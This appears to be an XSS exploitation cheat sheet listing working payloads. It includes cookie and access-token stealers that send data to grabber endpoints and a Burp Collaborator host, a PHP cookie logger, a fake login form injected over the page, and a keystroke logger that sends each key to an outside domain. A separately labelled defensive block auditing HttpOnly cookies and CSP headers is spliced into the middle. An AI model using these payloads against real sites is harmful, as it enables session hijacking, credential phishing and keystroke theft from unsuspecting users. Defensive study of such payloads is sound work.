Methodology

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>

Write the collected data into a file.

<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>

CORS

<script>
  fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>
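
From the defender's side, the snippets above only work when the session cookie is readable from script and when the browser is allowed to send image or fetch requests to an arbitrary host. The following is an added example, not part of the original page: it audits one response's Set-Cookie and Content-Security-Policy headers against those conditions. The function names, header values and the cdn.example.test host are constructed for illustration, and source matching is simplified to wildcard and bare-scheme sources.

```javascript
// Added defensive example (not from the original page).
// All header values below are constructed samples.

// Parse a CSP header into { directive: [sources...] }; the first duplicate wins.
function parseCsp(header) {
  const policy = {};
  for (const part of (header || '').split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in policy)) policy[key] = sources;
  }
  return policy;
}

// True when the directive (or its default-src fallback) lets requests reach any host.
function allowsAnyHost(policy, directive) {
  const sources = policy[directive] || policy['default-src'];
  if (!sources) return true; // no CSP restriction applies to this request type
  return sources.some((s) => ['*', 'http:', 'https:'].includes(s.toLowerCase()));
}

// Names of cookies exposed to document.cookie (no HttpOnly attribute).
function scriptReadableCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !h.split(';').slice(1).some((a) => a.trim().toLowerCase() === 'httponly'))
    .map((h) => h.split('=')[0].trim());
}

function audit(setCookieHeaders, cspHeader) {
  const policy = parseCsp(cspHeader);
  return {
    readableCookies: scriptReadableCookies(setCookieHeaders),
    imageBeaconOpen: allowsAnyHost(policy, 'img-src'), // new Image().src = ...
    fetchOpen: allowsAnyHost(policy, 'connect-src'),   // fetch(..., {mode: 'no-cors'})
  };
}

const weak = audit(['session=abc123; Path=/', 'theme=dark; Path=/'], '');
const hardened = audit(
  ['session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax', 'theme=dark; Path=/'],
  "default-src 'self'; img-src 'self' https://cdn.example.test"
);
console.log(weak, hardened);
```

Neither control covers everything listed here: localStorage values are always readable by script running in the page, and CSP fetch directives do not govern the top-level navigation used by the document.location variant.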

UI Redressing

Leverage the XSS to modify the HTML content of the page in order to display a fake login form.

<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>

JavaScript Keylogger

Another way to collect sensitive data is to set up a JavaScript keylogger.

<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>

Other Ways

More exploits at http://www.xss-payloads.com/payloads-list.html?a#category=all: